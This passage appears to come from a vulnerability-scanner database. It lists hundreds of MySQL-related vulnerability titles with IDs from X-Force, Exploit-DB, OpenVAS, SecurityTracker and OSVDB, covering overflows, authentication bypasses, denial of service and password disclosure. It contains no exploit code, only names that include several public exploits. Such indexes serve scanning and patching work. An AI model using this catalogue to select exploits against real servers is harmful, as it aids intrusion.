11049| [20984] xmysqladmin temporary file symlink
11050| [20656] MySQL mysql_install_db script symlink
11051| [20333] Plans MySQL password information disclosure
11052| [19659] MySQL CREATE TEMPORARY TABLE command creates insecure files
11053| [19658] MySQL udf_init function gain access
11054| [19576] auraCMS mysql_fetch_row function path disclosure
11055| [18922] MySQL mysqlaccess script symlink attack
11056| [18824] MySQL UDF root privileges
11057| [18464] mysql_auth unspecified vulnerability
11058| [18449] Sugar Sales plaintext MySQL password
11059| [17783] MySQL underscore allows elevated privileges
11060| [17768] MySQL MATCH ... AGAINST SQL statement denial of service
11061| [17667] MySQL UNION change denial of service
11062| [17666] MySQL ALTER TABLE RENAME bypass restriction
11063| [17493] MySQL libmysqlclient bulk inserts buffer overflow
11064| [17462] MySQLGuest AWSguest.php script cross-site scripting
11065| [17047] MySQL mysql_real_connect buffer overflow
11066| [17030] MySQL mysqlhotcopy insecure temporary file
11067| [16612] MySQL my_rnd buffer overflow
11068| [16604] MySQL check_scramble_323 function allows unauthorized access
11069| [15883] MySQL mysqld_multi script symlink attack
11070| [15617] MySQL mysqlbug script symlink attack
11071| [15417] Confixx db_mysql_loeschen2.php SQL injection
11072| [15280] Proofpoint Protection Server MySQL allows unauthorized access
11073| [13404] HP Servicecontrol Manager multiple vulnerabilities in MySQL could allow execution of code
11074| [13153] MySQL long password buffer overflow
11075| [12689] MySQL AB ODBC Driver stores ODBC passwords and usernames in plain text
11076| [12540] Teapop PostSQL and MySQL modules SQL injection
11077| [12337] MySQL mysql_real_connect function buffer overflow
11078| [11510] MySQL datadir/my.cnf modification could allow root privileges
11079| [11493] mysqlcc configuration and connection files are world writable
11080| [11340] SuckBot mod_mysql_logger denial of service
11081| [11199] MySQL mysql_change_user() double-free memory pointer denial of service
11082| [10850] MySQL libmysql client read_one_row buffer overflow
11083| [10849] MySQL libmysql client read_rows buffer overflow
11084| [10848] MySQL COM_CHANGE_USER password buffer overflow
11085| [10847] MySQL COM_CHANGE_USER command password authentication bypass
11086| [10846] MySQL COM_TABLE_DUMP unsigned integer denial of service
11087| [10483] Bugzilla stores passwords in plain text in the MySQL database
11088| [10455] gBook MySQL could allow administrative access
11089| [10243] MySQL my.ini "
11090| [9996] MySQL SHOW GRANTS command discloses adminstrator`s encrypted password
11091| [9909] MySQL logging disabled by default on Windows
11092| [9908] MySQL binding to the loopback adapter is disabled
11093| [9902] MySQL default root password could allow unauthorized access
11094| [8748] Cyrus SASL LDAP+MySQL patch allows user unauthorized POP access
11095| [8105] PHP MySQL client library allows an attacker to bypass safe_mode restrictions
11096| [7923] Conectiva Linux MySQL /var/log/mysql file has insecure permissions
11097| [7206] WinMySQLadmin stores MySQL password in plain text
11098| [6617] MySQL "
11099| [6419] MySQL drop database command buffer overflow
11100| [6418] MySQL libmysqlclient.so buffer overflow
11101| [5969] MySQL select buffer overflow
11102| [5447] pam_mysql authentication input
11103| [5409] MySQL authentication algorithm obtain password hash
11104| [5057] PCCS MySQL Database Admin Tool could reveal username and password
11105| [4228] MySQL unauthenticated remote access
11106| [3849] MySQL default test account could allow any user to connect to the database
11107| [1568] MySQL creates readable log files
11108|
11109| Exploit-DB - https://www.exploit-db.com:
11110| [30744] MySQL <= 5.1.23 Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability
11111| [30020] MySQL 5.0.x - IF Query Handling Remote Denial of Service Vulnerability
11112| [29724] MySQL 5.0.x Single Row SubSelect Remote Denial of Service Vulnerability
11113| [27326] MySQL 5.0.18 Query Logging Bypass Vulnerability
11114| [23073] MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)
11115| [20044] Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers
11116| [18269] MySQL 5.5.8 - Remote Denial of Service (DOS)
11117| [15467] Oracle MySQL < 5.1.49 'WITH ROLLUP' Denial of Service Vulnerability
11118| [9085] MySQL <= 5.0.45 COM_CREATE_DB Format String PoC (auth)
11119| [4615] MySQL <= 5.0.45 (Alter) Denial of Service Vulnerability
11120| [4392] PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability
11121| [1742] MySQL (<= 4.1.18, 5.0.20) Local/Remote Information Leakage Exploit
11122| [1741] MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit
11123|
11124| OpenVAS (Nessus) - http://www.openvas.org:
11125| [53251] Debian Security Advisory DSA 562-1 (mysql)
11126| [53230] Debian Security Advisory DSA 540-1 (mysql)
11127|
11128| SecurityTracker - https://www.securitytracker.com:
11129| [1028790] MySQL Multiple Bugs Let Remote Users Deny Service and Partially Access and Modify Data
11130| [1028449] MySQL Multiple Bugs Let Remote Authenticated Users Deny Service and Partially Access and Modify Data
11131| [1028004] MySQL Multiple Bugs Let Remote Authenticated Users Take Full Control or Deny Service and Let Local Users Access and Modify Data
11132| [1027829] MySQL Bug in UpdateXML() Lets Remote Authenticated Users Deny Service
11133| [1027828] MySQL Heap Overflow May Let Remote Authenticated Users Execute Arbitrary Code
11134| [1027827] MySQL Stack Overflow May Let Remote Authenticated Users Execute Arbitrary Code
11135| [1027665] MySQL Multiple Bugs Let Remote Authenticated Users Access and Modify Data and Deny Service and Local Users Access Data
11136| [1027263] MySQL Multiple Bugs Let Remote Authenticated Users Deny Service
11137| [1027143] MySQL memcmp() Comparison Error Lets Remote Users Bypass Authentication
11138| [1026934] MySQL Multiple Bugs Let Remote Users Deny Service
11139| [1026896] MySQL Unspecified Flaws Have Unspecified Impact
11140| [1026659] MySQL Unspecified Flaw Lets Remote Users Execute Arbitrary Code
11141| [1026530] MySQL Multiple Bugs Let Local and Remote Users Partially Access and Modifiy Data and Partially Deny Service
11142| [1024508] MySQL Replication Flaw Lets Remote Authenticated Users Gain Elevated Privileges
11143| [1024507] MySQL Multiple Flaws Let Remote Authenticated Users Deny Service
11144| [1024360] MySQL Multiple Flaws Let Remote Authenticated Users Deny Service
11145| [1024160] MySQL ALTER DATABASE Processing Error Lets Remote Authenticated Users Deny Service
11146| [1024033] MySQL COM_FIELD_LIST Packet Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code
11147| [1024032] MySQL Large Packet Processing Flaw in my_net_skip_rest() Lets Remote Users Deny Service
11148| [1024031] MySQL COM_FIELD_LIST Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
11149| [1024004] MySQL mi_delete_table() Symlink Flaw Lets Remote Authenticated Users Delete Data and Index Files
11150| [1023402] MySQL Unspecified Flaw Lets Remote Users Execute Arbitrary Code
11151| [1023220] MySQL Client Fails to Check Server Certificates in Certain Cases
11152| [1022812] MySQL Unspecified Buffer Overflow Lets Remote Users Execute Arbitrary Code
11153| [1022533] MySQL Format String Bug in dispatch_command() Lets Remote Users Deny Service
11154| [1022482] MySQL Connector/Net is Missing SSL Certificate Validation
11155| [1021786] MySQL Bug in ExtractValue()/UpdateXML() in Processing XPath Expressions Lets Remote Authenticated Users Deny Service
11156| [1021714] (Red Hat Issues Fix) mod_auth_mysql Input Validation Flaw Lets Remote Users Inject SQL Commands
11157| [1020858] MySQL Item_bin_string::Item_bin_string() Binary Value Processing Bug Lets Remote Authenticated Users Deny Service
11158| [1019995] MySQL MyISAM Options Let Local Users Overwrite Table Files
11159| [1019085] MySQL Bugs Let Remote Authenticated Users Gain Elevated Privileges and Deny Service
11160| [1019084] MySQL DATA DIRECTORY and INDEX DIRECTORY Options May Let Remote Authenticated Users Gain Elevated Privileges
11161| [1019083] MySQL BINLOG Filename Path Bug May Let Remote Authenticated Users Gain Elevated Privileges
11162| [1019060] MySQL Rename Table Bug Lets Remote Authenticated Users Modify System Table Information
11163| [1018978] MySQL convert_search_mode_to_innobase() Bug Lets Remote Authenticated Users Deny Service
11164| [1018824] Asterisk-Addons Input Validation Flaw in cdr_addon_mysql Lets Remote Users Inject SQL Commands
11165| [1018663] MySQL Table View Access Bug Lets Remote Authenticated Users Gain Elevated Privileges
11166| [1018629] MySQL Authentication Protocol Bug Lets Remote Users Deny Service
11167| [1018071] MySQL ALTER TABLE Function Lets Remote Authenticated Users Obtain Potentially Sensitive Information
11168| [1018070] MySQL SQL SECURITY INVOKER Routines Let Remote Authenticated Users Gain Elevated Privileges
11169| [1018069] MySQL Lets Remote Authenticated Users Issue the RENAME TABLE Command
11170| [1017746] MySQL Single Row Subselect Statements Let Remote Users Deny Service
11171| [1016790] MySQL Replication Error Lets Local Users Deny Service
11172| [1016710] MySQL Case-Sensitive Database Names May Let Users Access Restricted Databases
11173| [1016709] MySQL Error in Checking suid Routine Arguments May Let Users Gain Elevated Privileges
11174| [1016617] MySQL MERGE Access Control Error May Let Users Access a Restricted Table
11175| [1016566] Opsware Network Automation System Discloses MySQL Password to Local Users
11176| [1016216] MySQL Error in Parsing Multibyte Encoded Data in mysql_real_escape() Lets Remote Users Inject SQL Commands
11177| [1016077] Apple MySQL Manager Database Initialization Bug May Let Local Users Access the Database
11178| [1016017] MySQL Anonymous Login Processing May Disclose Some Memory Contents to Remote Users
11179| [1016016] MySQL COM_TABLE_DUMP Processing Lets Remote Authenticated Users Execute Arbitrary Code or Obtain Information
11180| [1015789] Woltlab Burning Board Input Validation Hole in 'class_db_mysql.php' Permits Cross-Site Scripting Attacks
11181| [1015693] MySQL Query Bug Lets Remote Users Bypass Query Logging
11182| [1015603] PAM-MySQL pam_get_item() Double Free May Let Remote Users Execute Arbitrary Code
11183| [1015485] PHP mysqli Extension Error Mode Format String Flaw May Let Users Execute Arbitrary Code
11184| [1014603] MySQL Eventum Input Validation Hole in 'class.auth.php' Permits SQL Injection and Other Input Validation Bugs Permit Cross-Site Scripting Attacks
11185| [1014172] xMySQLadmin Lets Local Users Delete Files
11186| [1013995] MySQL 'mysql_install_db' Uses Unsafe Temporary Files and May Let Local Users Gain Elevated Privilege
11187| [1013994] MySQL Non-existent '--user' Error May Allow the Database to Run With Incorrect Privileges
11188| [1013415] MySQL CREATE FUNCTION Lets Authenticated Users Invoke libc Functions to Execute Arbitrary Code
11189| [1013414] MySQL udf_init() Path Validation Flaw Lets Authenticated Users Execute Arbitrary Libraries
11190| [1013413] MySQL CREATE TEMPORARY TABLE Uses Predictable Temporary Files That May Let Users Gain Elevated Privileges
11191| [1012914] MySQL 'mysqlaccess.sh' Unsafe Temporary Files May Let Local Users Gain Elevated Privileges
11192| [1012893] MySQL MaxDB Buffer Overflow in websql Password Parameter Lets Remote Users Execute Arbitrary Code
11193| [1012500] mysql_auth Memory Leak Has Unspecified Impact
11194| [1011741] MySQL Access Control Error in Databases With Underscore Wildcard Character May Grant Unauthorized Access
11195| [1011606] MySQL May Let Remote Authenticated Users Access Restricted Tables or Crash the System
11196| [1011408] MySQL libmysqlclient Buffer Overflow in Executing Prepared Statements Has Unspecified Impact
11197| [1011376] MySQLGuest Lack of Input Validation Lets Remote Users Conduct Cross-Site Scripting Attacks
11198| [1011008] MySQL Buffer Overflow in mysql_real_connect() May Let Remote Users Execute Arbitrary Code
11199| [1010979] MySQL 'mysqlhotcopy' Unsafe Temporary Files May Let Local Users Gain Elevated Privileges
11200| [1010645] MySQL check_scramble_323() Zero-Length Comparison Lets Remote Users Bypass Authentication
11201| [1009784] MySQL 'mysqld_multi' Temporary File Flaw Lets Local Users Overwrite Files
11202| [1009554] MySQL 'mysqlbug' Temporary File Flaw Lets Local Users Overwrite Files
11203| [1007979] MySQL mysql_change_user() Double Free Error Lets Remote Authenticated Users Crash mysqld
11204| [1007673] MySQL acl_init() Buffer Overflow Permits Remote Authenticated Administrators to Execute Arbitrary Code
11205| [1007518] DWebPro Discloses MySQL Database Password to Local Users
11206| [1007312] MySQL World-Writable Configuration File May Let Local Users Gain Root Privileges
11207| [1006976] MySQL Buffer Overflow in 'mysql_real_connect()' Client Function May Let Remote or Local Users Execute Arbitrary Code
11208| [1005800] MySQL Overflow and Authentication Bugs May Let Remote Users Execute Code or Access Database Accounts
11209| [1005345] MySQL Buffer Overflow Lets Local Users Gain System Privileges on Windows NT
11210| [1004506] vBulletin PHP-based Forum Software Has Unspecified Security Flaw in the 'db_mysql.php' Module
11211| [1004172] PHP-Survey Script Discloses Underlying MySQL Database Username and Password to Remote Users
11212| [1003955] 3rd Party Patch for Cyrus SASL ('auxprop for mysql and ldap') Lets Remote Users Access Protected POP Mail Accounts Without Authentication
11213| [1003290] Conectiva Linux MySQL Distribution May Allow Local Users to Obtain Sensitive Information
11214| [1002993] PurePostPro Script Add-on for PureFTPd and MySQL Allows Remote Users to Execute SQL Commands on the Server
11215| [1002485] WinMySQLadmin Database Administration Tool Discloses MySQL Password to Local Users
11216| [1002324] Vpopmail Mail Server Discloses Database Password to Local Users When Installed with MySQL
11217| [1001411] phpMyAdmin Administration Tool for MySQL Allows Remote Users to Execute Commands on the Server
11218| [1001118] MySQL Database Allows Authorized Users to Modify Server Files to Deny Service or Obtain Additional Access
11219|
11220| OSVDB - http://www.osvdb.org:
11221| [95337] Oracle MySQL Server XA Transactions Subcomponent Unspecified Remote DoS
11222| [95336] Oracle MySQL Server Replication Subcomponent Unspecified Remote DoS
11223| [95335] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
11224| [95334] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue
11225| [95333] Oracle MySQL Server Partition Subcomponent Unspecified Remote DoS
11226| [95332] Oracle MySQL Server Parser Subcomponent Unspecified Remote DoS
11227| [95331] Oracle MySQL Server Options Subcomponent Unspecified Remote DoS (2013-3801)
11228| [95330] Oracle MySQL Server Options Subcomponent Unspecified Remote DoS (2013-3808)
11229| [95329] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2013-3796)
11230| [95328] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2013-3804)
11231| [95327] Oracle MySQL Server Prepared Statements Subcomponent Unspecified Remote DoS
11232| [95326] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
11233| [95325] Oracle MySQL Server Full Text Search Subcomponent Unspecified Remote DoS
11234| [95324] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-3795)
11235| [95323] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-3793)
11236| [95322] Oracle MySQL Server Audit Log Subcomponent Unspecified Remote Issue
11237| [95321] Oracle MySQL Server MemCached Subcomponent Unspecified Remote Issue
11238| [95131] AutoMySQLBackup /usr/sbin/automysqlbackup Database Name Arbitrary Code Injection
11239| [94076] Debian Linux MySQL Server mysql-server-5.5.postinst Race Condition debian.cnf Plaintext Credential Local Disclosure
11240| [93505] Wireshark MySQL Dissector (packet-mysql.c) Malformed Packet Handling Infinite Loop Remote DoS
11241| [93174] MySQL Crafted Derived Table Handling DoS
11242| [92967] MySQL2JSON (mn_mysql2json) Extension for TYPO3 Unspecified SQL Injection
11243| [92950] MySQL Running START SLAVE Statement Process Listing Plaintext Local Password Disclosure
11244| [92485] Oracle MySQL Server Partition Subcomponent Unspecified Local DoS
11245| [92484] Oracle MySQL Server Locking Subcomponent Unspecified Remote DoS (2013-1506)
11246| [92483] Oracle MySQL Server Install Subcomponent Unspecified Local Issue
11247| [92482] Oracle MySQL Server Types Subcomponent Unspecified Remote DoS
11248| [92481] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-2381)
11249| [92480] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-1566)
11250| [92479] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-1511)
11251| [92478] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1567)
11252| [92477] Oracle MySQL Server Stored Procedure Subcomponent Unspecified Remote DoS
11253| [92476] Oracle MySQL Server Replication Subcomponent Unspecified Remote DoS
11254| [92475] Oracle MySQL Server Partition Subcomponent Unspecified Remote DoS
11255| [92474] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS
11256| [92473] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-2389)
11257| [92472] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote DoS
11258| [92471] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1512)
11259| [92470] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1544)
11260| [92469] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote Issue
11261| [92468] Oracle MySQL Server MemCached Subcomponent Unspecified Remote DoS
11262| [92467] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-2375)
11263| [92466] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-1531)
11264| [92465] Oracle MySQL Server Server Subcomponent Unspecified Remote Issue
11265| [92464] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote Issue
11266| [92463] Oracle MySQL Server Locking Subcomponent Unspecified Remote Issue (2013-1521)
11267| [92462] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-2395)
11268| [91536] Oracle MySQL yaSSL Unspecified Overflow (2012-0553)
11269| [91534] Oracle MySQL yaSSL Unspecified Overflow (2013-1492)
11270| [91415] MySQL Raw Geometry Object String Conversion Remote DoS
11271| [91108] Juju mysql Charm Install Script mysql.passwd MySQL Password Plaintext Local Disclosure
11272| [89970] Site Go /site-go/admin/extra/mysql/index.php idm Parameter Traversal Arbitrary File Access
11273| [89265] Oracle MySQL Server Server Privileges Subcomponent Unspecified Remote DoS
11274| [89264] Oracle MySQL Server Server Partition Subcomponent Unspecified Remote DoS
11275| [89263] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-0578)
11276| [89262] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-1705)
11277| [89261] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-0574)
11278| [89260] Oracle MySQL Server MyISAM Subcomponent Unspecified Remote DoS
11279| [89259] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2012-0572)
11280| [89258] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-0368)
11281| [89257] Oracle MySQL Server Server Locking Subcomponent Unspecified Remote DoS
11282| [89256] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-1702)
11283| [89255] Oracle MySQL Server Server Replication Subcomponent Unspecified Remote Issue
11284| [89254] Oracle MySQL Server Server Replication Subcomponent Unspecified Local Issue
11285| [89253] Oracle MySQL Server Stored Procedure Subcomponent Unspecified Remote DoS
11286| [89252] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS
11287| [89251] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote DoS
11288| [89250] Oracle MySQL Server GIS Extension Subcomponent Unspecified Remote DoS
11289| [89042] ViciBox Server MySQL cron Service Default Credentials
11290| [88415] Oracle MySQL Server COM_CHANGE_USER Account Password Brute-Force Weakness
11291| [88118] Oracle MySQL Server FILE Privilege Database Privilege Escalation
11292| [88067] Oracle MySQL Server Authentication Error Message User Enumeration
11293| [88066] Oracle MySQL Server for Linux Access Rights Checking Routine Database Name Handling Stack Buffer Overflow
11294| [88065] Oracle MySQL Server COM_BINLOG_DUMP Invalid Data Handling DoS
11295| [88064] Oracle MySQL Server Multiple-Table DELETE Heap Buffer Overflow
11296| [87704] CodeIgniter MySQL / MySQLi Driver Database Client Multi-byte Character Set Unspecified SQL Injection
11297| [87507] Oracle MySQL Statement Logging Multiple Log Plaintext Local Password Disclosure
11298| [87501] Oracle MySQL optimizer_switch Malformed Value Processing Local DoS
11299| [87494] Oracle MySQL on Windows Field_new_decimal::store_value dbug_buff Variable Overflow DoS
11300| [87480] MySQL Malformed XML Comment Handling DoS
11301| [87466] MySQL SSL Certificate Revocation Weakness
11302| [87356] Oracle MySQL do_div_mod DIV Expression Handling Remote DoS
11303| [87355] Oracle MySQL handler::pushed_cond Table Cache Handling mysqld DoS
11304| [87354] Oracle MySQL Polygon Union / Intersection Spatial Operations DoS
11305| [86273] Oracle MySQL Server Server Installation Subcomponent Unspecified Local Information Disclosure
11306| [86272] Oracle MySQL Server Server Replication Subcomponent Unspecified Remote DoS
11307| [86271] Oracle MySQL Server Server Full Text Search Subcomponent Unspecified Remote DoS
11308| [86270] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3156)
11309| [86269] Oracle MySQL Server MySQL Client Subcomponent Unspecified Remote Information Disclosure
11310| [86268] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-3180)
11311| [86267] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-3150)
11312| [86266] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3144)
11313| [86265] Oracle MySQL Server InnoDB Plugin Subcomponent Unspecified Remote DoS
11314| [86264] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
11315| [86263] Oracle MySQL Server MySQL Client Subcomponent Unspecified Remote Issue
11316| [86262] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3177)
11317| [86261] Oracle MySQL Server Protocol Subcomponent Unspecified Remote Issue
11318| [86260] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote Code Execution
11319| [86175] Oracle MySQL on Windows Path Subversion Arbitrary DLL Injection Code Execution
11320| [85155] Icinga module/idoutils/db/scripts/create_mysqldb.sh Icinga User Database Access Restriction Bypass
11321| [84755] Oracle MySQL Sort Order Index Calculation Remote DoS
11322| [84719] MySQLDumper index.php page Parameter XSS
11323| [84680] MySQL Squid Access Report access.log File Path XSS
11324| [83980] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1689)
11325| [83979] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1734)
11326| [83978] Oracle MySQL Server Subcomponent Unspecified Remote DoS
11327| [83977] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
11328| [83976] Oracle MySQL Server GIS Extension Subcomponent Unspecified Remote DoS
11329| [83975] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1735)
11330| [83661] Oracle MySQL Unspecified Issue (59533)
11331| [82804] Oracle MySQL Authentication Protocol Token Comparison Casting Failure Password Bypass
11332| [82803] Oracle MySQL Unspecified Issue (59387)
11333| [82120] Oracle MySQL Version Specific Comment Handling Arbitrary SQL Command Execution
11334| [81897] Viscacha classes/database/mysql.inc.php Multiple Parameter SQL Injection
11335| [81616] MySQLDumper Multiple Script Direct Request Information Disclosure
11336| [81615] MySQLDumper filemanagement.php f Parameter Traversal Arbitrary File Access
11337| [81614] MySQLDumper File Upload PHP Code Execution
11338| [81613] MySQLDumper main.php Multiple Function CSRF
11339| [81612] MySQLDumper restore.php filename Parameter XSS
11340| [81611] MySQLDumper sql.php Multiple Parameter XSS
11341| [81610] MySQLDumper install.php Multiple Parameter XSS
11342| [81609] MySQLDumper install.php language Parameter Traversal Arbitrary File Access
11343| [81378] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1690)
11344| [81377] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1696)
11345| [81376] Oracle MySQL Server Server DML Component Unspecified Remote DoS
11346| [81375] Oracle MySQL Server Partition Component Unspecified Remote DoS
11347| [81374] Oracle MySQL Server MyISAM Component Unspecified Remote DoS
11348| [81373] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1703)
11349| [81059] Oracle MySQL Server Multiple Unspecified Issues
11350| [79038] Webmin Process Listing MySQL Password Local Disclosure
11351| [78919] Oracle MySQL Unspecified Pre-authentication Remote Code Execution
11352| [78710] WordPress wp-admin/setup-config.php MySQL Query Saturation Brute-Force Proxy Weakness
11353| [78708] WordPress wp-admin/setup-config.php MySQL Database Verification Code Injection Weakness
11354| [78707] WordPress wp-admin/setup-config.php MySQL Credentials Error Message Brute-Force Weakness
11355| [78394] Oracle MySQL Server Unspecified Remote DoS (2012-0493)
11356| [78393] Oracle MySQL Server Unspecified Remote DoS (2012-0492)
11357| [78392] Oracle MySQL Server Unspecified Remote DoS (2012-0117)
11358| [78391] Oracle MySQL Server Unspecified Remote DoS (2012-0112)
11359| [78390] Oracle MySQL Server Unspecified Remote DoS (2012-0495)
11360| [78389] Oracle MySQL Server Unspecified Remote DoS (2012-0491)
11361| [78388] Oracle MySQL Server Unspecified Remote DoS (2012-0490)
11362| [78387] Oracle MySQL Server Unspecified Remote DoS (2012-0489)
11363| [78386] Oracle MySQL Server Unspecified Remote DoS (2012-0488)
11364| [78385] Oracle MySQL Server Unspecified Remote DoS (2012-0487)
11365| [78384] Oracle MySQL Server Unspecified Remote DoS (2012-0486)
11366| [78383] Oracle MySQL Server Unspecified Remote DoS (2012-0485)
11367| [78382] Oracle MySQL Server Unspecified Remote DoS (2012-0120)
11368| [78381] Oracle MySQL Server Unspecified Remote DoS (2012-0119)
11369| [78380] Oracle MySQL Server Unspecified Remote DoS (2012-0115)
11370| [78379] Oracle MySQL Server Unspecified Remote DoS (2012-0102)
11371| [78378] Oracle MySQL Server Unspecified Remote DoS (2012-0101)
11372| [78377] Oracle MySQL Server Unspecified Remote DoS (2012-0087)
11373| [78376] Oracle MySQL Server Unspecified Remote DoS (2011-2262)
11374| [78375] Oracle MySQL Server Unspecified Local DoS
11375| [78374] Oracle MySQL Server Unspecified Remote Issue (2012-0075)
11376| [78373] Oracle MySQL Server Unspecified Local Issue
11377| [78372] Oracle MySQL Server Unspecified Remote Information Disclosure
11378| [78371] Oracle MySQL Server Unspecified Remote Issue (2012-0496)
11379| [78370] Oracle MySQL Server Unspecified Remote Issue (2012-0118)
11380| [78369] Oracle MySQL Server Unspecified Remote Issue (2012-0116)
11381| [78368] Oracle MySQL Server Unspecified Remote Issue (2012-0113)
11382| [78283] Oracle MySQL NULL Pointer Dereference Packet Parsing Remote DoS
11383| [77042] e107 CMS install_.php MySQL Server Name Parsing Remote PHP Code Execution
11384| [77040] DBD::mysqlPP Unspecified SQL Injection
11385| [75888] TaskFreak! multi-mysql Multiple Script Direct Request Path Disclosure
11386| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
11387| [73555] Prosody MySQL Value Column Invalid Data Type Handling DoS
11388| [73387] Zend Framework PDO_MySql Character Set Security Bypass
11389| [72836] Arctic Fox CMS Multiple Script Direct Request MySQL Settings Disclosure
11390| [72660] MySQL GUI Tools Administrator / Query Browser Command Line Credentials Local Disclosure
11391| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
11392| [71368] Accellion File Transfer Appliance Weak MySQL root Password
11393| [70967] MySQL Eventum Admin User Creation CSRF
11394| [70966] MySQL Eventum preferences.php full_name Parameter XSS
11395| [70961] MySQL Eventum list.php Multiple Parameter XSS
11396| [70960] MySQL Eventum forgot_password.php URI XSS
11397| [70947] PyWebDAV DAVServer/mysqlauth.py get_userinfo() Multiple Parameter SQL Injection
11398| [70610] PHP MySQLi Extension set_magic_quotes_runtime Function mysqli_fetch_assoc Function Interaction Weakness
11399| [69885] SilverStripe modules/sapphire/trunk/core/model/MySQLDatabase.php showqueries Parameter SQL Command Disclosure
11400| [69395] MySQL Derived Table Grouping DoS
11401| [69394] MySQL Temporary Table Expression Re-Evaluation DoS
11402| [69393] MySQL GROUP_CONCAT() WITH ROLLUP Modifier DoS
11403| [69392] MySQL Extreme-Value Functions Mixed Arguments DoS
11404| [69391] MySQL Stored Procedures / Prepared Statements Nested Joins DoS
11405| [69390] MySQL Extreme-Value Functions Argument Parsing Type Error DoS
11406| [69389] MySQL CONVERT_TZ() Function Empty SET Column DoS
11407| [69388] MySQL InnoDB Storage Engine Table Handling Overflow
11408| [69387] MySQL LIKE Predicates Pre-Evaluation DoS
11409| [69001] MySQL PolyFromWKB() Function WKB Data Remote DoS
11410| [69000] MySQL HANDLER Interface Unspecified READ Request DoS
11411| [68997] MySQL Prepared-Statement Mode EXPLAIN DoS
11412| [68996] MySQL EXPLAIN EXTENDED Statement DoS
11413| [68995] MySQL GeometryCollection non-Geometry Value Assignment DoS
11414| [67488] phpMyAdmin libraries/dbi/mysqli.dbi.lib.php Unspecified Parameter XSS
11415| [67487] phpMyAdmin libraries/dbi/mysql.dbi.lib.php Unspecified Parameter XSS
11416| [67421] PHP Mysqlnd Extension mysqlnd_wireprotocol.c php_mysqlnd_rset_header_read Function Overflow
11417| [67420] PHP Mysqlnd Extension mysqlnd_wireprotocol.c php_mysqlnd_ok_read Function Arbitrary Memory Content Disclosure
11418| [67419] PHP Mysqlnd Extension php_mysqlnd_read_error_from_line Function Negative Buffer Length Value Overflow
11419| [67418] PHP Mysqlnd Extension php_mysqlnd_auth_write Function Multiple Overflows
11420| [67384] MySQL LOAD DATA INFILE Statement Incorrect OK Packet DoS
11421| [67383] MySQL EXPLAIN Statement Item_singlerow_subselect::store Function NULL Dereference DoS
11422| [67381] MySQL InnoDB Temporary Table Handling DoS
11423| [67380] MySQL BINLOG Statement Unspecified Argument DoS
11424| [67379] MySQL Multiple Operation NULL Argument Handling DoS
11425| [67378] MySQL Unique SET Column Join Statement Remote DoS
11426| [67377] MySQL DDL Statement Multiple Configuration Parameter DoS
11427| [66800] PHP Multiple mysqlnd_* Function Unspecified Overflow
11428| [66799] PHP mysqlnd Error Packet Handling Multiple Overflows
11429| [66731] PHP Bundled MySQL Library Unspecified Issue
11430| [66665] PHP MySQL LOAD DATA LOCAL open_basedir Bypass
11431| [65851] MySQL ALTER DATABASE #mysql50# Prefix Handling DoS
11432| [65450] phpGraphy mysql_cleanup.php include_path Parameter Remote File Inclusion
11433| [65085] MySQL Enterprise Monitor Unspecified CSRF
11434| [64843] MySQL DROP TABLE Command Symlink MyISAM Table Local Data Deletion
